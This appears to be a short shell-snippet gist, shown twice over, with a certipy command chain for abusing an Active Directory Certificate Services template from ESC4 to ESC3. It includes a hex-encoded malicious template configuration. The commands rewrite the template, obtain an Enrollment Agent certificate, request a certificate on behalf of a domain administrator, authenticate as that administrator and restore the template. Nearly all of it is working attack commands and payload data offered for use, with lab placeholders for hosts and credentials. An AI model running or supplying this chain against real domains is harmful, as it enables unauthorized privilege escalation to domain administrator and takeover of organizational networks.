zimnyaa/ESC4-to-ESC3.sh

## ESC4-to-ESC3.sh
# the policy JSON template for certipy is:
# {"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"], "msPKI-Certificate-Application-Policy": ["312e332e362e312e342e312e3331312e32302e322e31"]}
# if broken, get one from a lab instead: https://github.com/arth0sz/Practice-AD-CS-Domain-Escalation

~$ certipy template -u domainuser@lab.local -p password -dc-ip 10.3.10.11 -template ESC4 -configuration set-ESC3.json -save-old # set the template to ESC3
~$ certipy req -u domainuser@lab.local -p password -ca myCA -target 10.3.10.11 -template ESC4 # get the Enrollment Agent PFX
~$ certipy req -u domainuser@lab.local -p password -ca myCA -target 10.3.10.11 -template User -on-behalf-of 'lab\domainadmin' -pfx domainuser.pfx # use the Enrollment Agent Cert
~$ certipy auth -pfx domainadmin.pfx -dc-ip 10.3.10.11 -debug # auth
~$ certipy template -u domainuser@lab.local -p password -dc-ip 10.3.10.11 -template ESC4 -configuration ESC4.json # restore
	# the policy JSON template for certipy is:
	# {"showInAdvancedViewOnly": ["54525545"], "nTSecurityDescriptor": ["0100049c3000000000000000000000001400000002001c000100000000001400ff010f0001010000000000050b000000010500000000000515000000c8a31fdde9bab8902cae73bbf4010000"], "flags": ["313331363136"], "pKIDefaultKeySpec": ["32"], "pKIKeyUsage": ["8000"], "pKIMaxIssuingDepth": ["30"], "pKICriticalExtensions": ["322e352e32392e37", "322e352e32392e3135"], "pKIExpirationPeriod": ["004039872ee1feff"], "pKIOverlapPeriod": ["0080a60affdeffff"], "pKIExtendedKeyUsage": ["312e332e362e312e342e312e3331312e32302e322e31"], "pKIDefaultCSPs": ["312c4d6963726f736f667420456e68616e6365642043727970746f677261706869632050726f76696465722076312e30", "322c4d6963726f736f667420426173652043727970746f677261706869632050726f76696465722076312e30"], "msPKI-RA-Signature": ["30"], "msPKI-Enrollment-Flag": ["3332"], "msPKI-Private-Key-Flag": ["3136383432373532"], "msPKI-Certificate-Name-Flag": ["3333353534343332"], "msPKI-Minimal-Key-Size": ["32303438"], "msPKI-Certificate-Application-Policy": ["312e332e362e312e342e312e3331312e32302e322e31"]}
	# if broken, get one from a lab instead: https://github.com/arth0sz/Practice-AD-CS-Domain-Escalation

	~$ certipy template -u domainuser@lab.local -p password -dc-ip 10.3.10.11 -template ESC4 -configuration set-ESC3.json -save-old # set the template to ESC3
	~$ certipy req -u domainuser@lab.local -p password -ca myCA -target 10.3.10.11 -template ESC4 # get the Enrollment Agent PFX
	~$ certipy req -u domainuser@lab.local -p password -ca myCA -target 10.3.10.11 -template User -on-behalf-of 'lab\domainadmin' -pfx domainuser.pfx # use the Enrollment Agent Cert
	~$ certipy auth -pfx domainadmin.pfx -dc-ip 10.3.10.11 -debug # auth
	~$ certipy template -u domainuser@lab.local -p password -dc-ip 10.3.10.11 -template ESC4 -configuration ESC4.json # restore